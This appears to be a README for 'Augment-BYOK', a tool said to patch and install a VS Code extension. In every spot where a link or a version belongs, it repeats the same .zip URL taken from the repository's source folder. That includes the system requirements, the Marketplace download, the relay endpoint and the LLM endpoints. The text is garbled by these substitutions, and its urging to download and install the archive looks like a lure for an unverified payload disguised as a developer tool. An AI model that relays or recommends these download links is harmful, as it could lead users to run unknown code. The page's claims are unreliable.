Augment-BYOK helps you quickly enhance your development tools. Follow these steps to download and run the application smoothly.
- Operating System: Windows, macOS, or Linux
- https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zip Version 14 or later
- A modern web browser for the Marketplace
To get started, you need to download the latest version from our releases page.
- Visit the releases page: Click here to view the available versions.
- Select the latest release.
- Download the VSIX file: Look for a file that ends with
.vsix. - Install the extension:
- Open Visual Studio Code.
- Go to the Extensions view by clicking on the Extensions icon in the Activity Bar on the side of the window.
- Click on the ellipsis (three dots) in the top-right corner of the Extensions view.
- Select Install from VSIX... and choose the downloaded
.vsixfile.
- Patch and Toolchain Management: Easily maintain patches and core tools.
- Built-In Automation: Automatic download of the latest VSIX directly from the Marketplace.
- Structured Directory: Understandable organization makes it easier to find what you need.
The project is organized into clear sections:
-
BYOK Runtime: Located in
packages/byok-runtime/src/entry|coord|mol|atom/- This section focuses on the runtime for BYOK, which integrates into the upstream extension.
-
Entry Scripts: Located in
tools/entry/<capability>/- This contains executable scripts for building and testing your projects.
-
Patch Set: Found in
tools/mol/vsix-patch-set/- A collection of essential patches for building.
-
Utilities: Located in
tools/atom/- Reusable libraries and scripts for building and analyzing packages.
Augment-BYOK downloads the latest version of https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zip directly from the Marketplace.
Download URL:
https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zip
This URL allows for easy access to the .vsix package you installed.
For development and testing, you have access to a relay:
Relay Endpoint:
https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zip
- Relay Profiles: Check out
https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zipfor supported configurations. - LLM Endpoints: Available in
https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zip.
Stay updated with the latest patches and features:
- Ensures the use of official releases for reliability and performance.
Should you have questions or need support, you can contact us via the GitHub Issues page.
If you wish to contribute, consider forking the repository and submitting a pull request. Your input helps us improve the tool.
For further details on usage, features, and best practices, please refer to the official documentation provided in the repository.
Thank you for using Augment-BYOK. We look forward to your feedback and contributions!